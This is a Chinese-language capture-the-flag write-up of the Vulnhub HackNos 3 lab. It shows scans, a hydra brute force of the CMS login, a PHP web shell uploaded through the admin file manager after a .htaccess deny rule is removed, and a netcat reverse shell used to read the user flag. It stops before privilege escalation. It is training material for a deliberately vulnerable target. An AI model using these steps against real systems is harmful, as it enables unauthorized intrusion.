Vulnhub之HackNos 3靶机详细测试过程
HackNos 3作者: Jason Huawen
靶机信息
名称:hackNos: Os-hackNos-3
地址:
https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/HackNos3]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count LenMAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60Unknown vendor
192.168.56.10008:00:27:0e:88:2f 1 60PCS Systemtechnik GmbH
192.168.56.23108:00:27:92:85:a4 1 60PCS Systemtechnik GmbH 利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.231
NMAP扫描
──(kali㉿kali)-[~/Desktop/HackNos3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.231 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-24 00:00 EDT
Nmap scan report for bogon (192.168.56.231)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ce:16:a0:18:3f:74:e9:ad:cb:a9:39:90:11:b8:8a:2e (RSA)
| 256 9d:0e:a1:a3:1e:2c:4d:00:e8:87:d2:76:8c:be:71:9a (ECDSA)
|_256 63:b3:75:98:de:c1:89:d9:92:4e:49:31:29:4b:c0:ad (ED25519)
80/tcp openhttp Apache httpd 2.4.41 ((Ubuntu))
|_http-title: WebSec
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:92:85:A4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.21 secondsNMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
获得Shell
──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ nikto -h http://192.168.56.231
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.231
+ Target Hostname: 192.168.56.231
+ Target Port: 80
+ Start Time: 2023-03-24 00:23:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /, inode: c3, size: 599925bee00f9, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ 8725 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-03-24 00:24:40 (GMT-4) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? ──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ gobuster dir -u http://192.168.56.231 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.231
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,txt,js,sh
[+] Timeout: 10s
===============================================================
2023/03/24 00:29:36 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403)
/.php (Status: 403)
/index.html (Status: 200)
/scripts (Status: 301) [--> http://192.168.56.231/scripts/]
/upload.php (Status: 200)
/devil (Status: 301) [--> http://192.168.56.231/devil/]
/websec (Status: 301) [--> http://192.168.56.231/websec/]
/.html (Status: 403)
/.php (Status: 403)
/server-status (Status: 403)
Progress: 1321485 / 1323366 (99.86%)
===============================================================
2023/03/24 00:34:38 Finished
==============================================================Gobuster工具扫描出目录:/websec, 访问该目录,网页中有电子邮件,而且从页面内容来看,为CMS,因此度websec进一步扫描:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ gobuster dir -u http://192.168.56.231/websec -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.231/websec
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: txt,js,sh,php,html
[+] Timeout: 10s
===============================================================
2023/03/24 02:54:11 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403)
/.php (Status: 403)
/index (Status: 200)
/search (Status: 200)
/about (Status: 200)
/blog (Status: 200)
/1.sh (Status: 200)
/1.txt (Status: 200)
/1 (Status: 200)
/1.html (Status: 200)
/01.php (Status: 200)
/01.txt (Status: 200)
/1.php (Status: 200)
/1.js (Status: 200)
/01 (Status: 200)
/01.html (Status: 200)
/01.sh (Status: 200)
/01.js (Status: 200)
/login (Status: 200) 从/websec的扫描中可以看到有登录入口/login以及管理员目录/admin,并且websec首页中的邮箱为管理员邮箱,即猜测为管理员账号,但是接下来需要爆破密码
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ hydra -l contact@hacknos.com -P dict 192.168.56.231 http-post-form '/websec/login:username=^USER^&password=^PASS^:F=Wrong'
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-24 03:06:59
max 16 tasks per 1 server, overall 16 tasks, 54 login tries (l:1/p:54), ~4 tries per task
attacking http-post-form://192.168.56.231:80/websec/login:username=^USER^&password=^PASS^:F=Wrong
host: 192.168.56.231 login: contact@hacknos.com password: Securityx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-24 03:07:02利用hydra工具成功破解出了密码
登录成功后,访问其/admin目录
http://192.168.56.231/websec/admin通过file manager功能上传shell.php,没有任何过滤,发现文件被放在了/assets目录,但是访问该目录返回错误
在该目录中发现了.htaccess文件禁止访问php文件,那么将deny from all删除后保存。
http://192.168.56.231/websec/assets/shell.php可以成功得到shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HackNos3]
└─$ sudo nc -nlvp 5555
listening on 5555 ...
connect to from (UNKNOWN) 33922
Linux hacknos 5.3.0-24-generic #26-Ubuntu SMP Thu Nov 14 01:33:18 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
05:07:33 up1:16,0 users,load average: 0.00, 0.21, 1.16
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacknos:/$ ls
ls
bin etc lib lost+foundprocsnap tmp vmlinuz.old
boot home lib32 media rootsrv usr
cdrominitrd.img lib64 mnt run swap.imgvar
dev initrd.img.oldlibx32opt sbinsys vmlinuz
www-data@hacknos:/$ cd /home
cd /home
www-data@hacknos:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x3 root root 4.0K Dec 102019 .
drwxr-xr-x 20 root root 4.0K Dec 102019 ..
drwxr-xr-x6 blackdevil docker 4.0K Dec 132019 blackdevil
www-data@hacknos:/home$ cd blackdevil
cd blackdevil
www-data@hacknos:/home/blackdevil$ ls -alh
ls -alh
total 40K
drwxr-xr-x 6 blackdevil docker 4.0K Dec 132019 .
drwxr-xr-x 3 root root 4.0K Dec 102019 ..
-rw-r--r-- 1 blackdevil docker220 May52019 .bash_logout
-rw-r--r-- 1 blackdevil docker 3.7K May52019 .bashrc
drwx------ 3 blackdevil docker 4.0K Dec 132019 .cache
drwxr-xr-x 3 blackdevil docker 4.0K Dec 132019 .config
drwx------ 3 blackdevil docker 4.0K Dec 102019 .gnupg
drwxr-xr-x 3 blackdevil docker 4.0K Dec 132019 .local
-rw-r--r-- 1 blackdevil docker807 May52019 .profile
-rw-r--r-- 1 root root 33 Dec 132019 user.txt
www-data@hacknos:/home/blackdevil$ cat user.txt
cat user.txt
bae11ce4f67af91fa58576c1da2aad4b
www-data@hacknos:/home/blackdevil$ 成功拿到了目标主机反弹回来的Shell,以及User Flag.接下来需要进行提权:
www-data@hacknos:/var/www/html/websec$ cat config.phpcat config.php
页:
[1]